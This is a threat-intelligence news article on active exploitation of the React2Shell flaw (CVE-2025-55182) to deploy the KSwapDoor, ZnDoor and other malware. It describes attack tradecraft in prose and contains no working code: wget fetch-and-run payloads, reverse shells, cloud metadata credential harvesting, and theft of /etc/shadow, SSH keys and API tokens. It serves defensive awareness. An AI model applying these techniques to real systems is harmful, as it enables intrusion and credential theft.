A critical security vulnerability dubbed React2Shell is being actively exploited by various threat actors to deploy sophisticated malware, including KSwapDoor and ZnDoor. Cybersecurity researchers from Palo Alto Networks Unit 42 and NTT Security have detailed how this flaw, identified as CVE-2025-55182, is enabling attackers to gain unauthorized access and control over compromised systems, particularly impacting Linux environments.
The React2Shell vulnerability, which carries a CVSS score of 10.0, allows threat actors to execute arbitrary commands on target systems. This capability is being leveraged for extensive post-exploitation activities, including the establishment of reverse shells and the deployment of remote monitoring and management (RMM) tools. The exploitation chain often involves downloading and executing malicious payloads from remote servers, bypassing security measures through various evasion techniques.
React2Shell Exploitation: A Widespread Threat
The React2Shell vulnerability has become a significant concern in the cybersecurity landscape, with multiple threat actors actively weaponizing it to deliver a diverse range of payloads. Google has identified at least five China-nexus groups that are exploiting this flaw. These groups are using React2Shell to deploy tools such as MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, and ANGRYREBEL, highlighting the broad applicability and high impact of this vulnerability.
In one observed campaign, threat actors are using React2Shell to deliver KSwapDoor, a stealthy remote access tool engineered for its covert operations. Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, described KSwapDoor as a tool that builds an internal mesh network, enabling compromised servers to communicate with each other and evade detection. It employs advanced encryption and a unique “sleeper” mode that allows attackers to bypass firewalls by activating the malware with an undetectable signal.
Additionally, NTT Security has reported that organizations in Japan are being targeted by attacks that leverage React2Shell to deploy ZnDoor, a malware family detected in the wild since December 2023. The attack typically begins with a bash command executed via wget to retrieve the malicious payload from a remote server and then run it.
Malware Capabilities and Evasion Tactics
The malware families being delivered through React2Shell exploits exhibit a range of advanced functionalities. KSwapDoor, for instance, impersonates a legitimate Linux kernel swap daemon to avoid detection and offers capabilities such as interactive shell, command execution, file operations, and lateral movement scanning. This sophisticated design makes it particularly challenging for security systems to identify and neutralize.
ZnDoor, a remote access trojan, communicates with threat actor-controlled infrastructure to receive and execute commands. The commands supported by ZnDoor include executing shell commands, launching interactive shells, managing files and directories, gathering system information, and even initiating SOCKS5 proxy or port forwarding for further network intrusion. Some of the listed commands include `shell`, `interactive_shell`, `explorer`, `explorer_cat`, `explorer_delete`, `explorer_upload`, `explorer_download`, `system`, `change_timefile`, `socket_quick_startstreams`, `start_in_port_forward`, and `stop_in_port`.
Microsoft’s advisory on CVE-2025-55182 details how attackers are using the vulnerability to set up reverse shells, deploy RMM tools like MeshAgent, and modify system configurations to enable persistent access. The payloads observed in these attacks include VShell, EtherRAT, SNOWLIGHT, ShadowPad, and XMRig. Attackers are also employing Cloudflare Tunnel endpoints to conceal their malicious traffic and conducting thorough reconnaissance of compromised environments to facilitate credential theft and lateral movement within the network.
Furthermore, credential harvesting activities have been observed targeting cloud metadata services, including Azure Instance Metadata Service (IMDS), as well as endpoints for Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud. The ultimate goal is to obtain identity tokens for deeper infiltration into cloud infrastructures. Attackers are also deploying secret discovery tools like TruffleHog and Gitleaks, along with custom scripts, to extract sensitive information, including AI and cloud-native credentials such as OpenAI API keys, Databricks tokens, and Kubernetes service account credentials. Tools like Azure CLI were also used to obtain tokens.
In a separate campaign, researchers detailed how flaws in Next.js, including the React2Shell vulnerability, are being exploited for systematic extraction of sensitive data. This includes environment variables, SSH keys, cloud credentials, Git credentials, command history, and critical system files like `/etc/shadow` and `/etc/passwd`. The malware then establishes persistence, installs a SOCKS5 proxy, and initiates a reverse shell to a command-and-control server, while also deploying a React scanner for further propagation.
Prevalence and Future Outlook
The Shadowserver Foundation is actively tracking over 111,000 IP addresses that are vulnerable to React2Shell attacks. The United States accounts for the largest share of these vulnerable IPs, followed by Germany, France, and India. Data from GreyNoise indicates significant malicious IP address activity from the U.S., India, the U.K., Singapore, and the Netherlands in the past 24 hours, underscoring the ongoing exploitation efforts.
Given the widespread exploitation and the critical nature of the React2Shell vulnerability, organizations are strongly advised to apply any available patches or security mitigations as soon as possible. Continuous monitoring for suspicious network activity and endpoint behavior, along with regular security audits, will be crucial in defending against these evolving threats. The sustained interest from multiple threat actor groups suggests that exploitation of React2Shell and the deployment of related malware will likely continue. Security vendors and researchers will continue to monitor for new variants and attack techniques emerging from this vulnerability.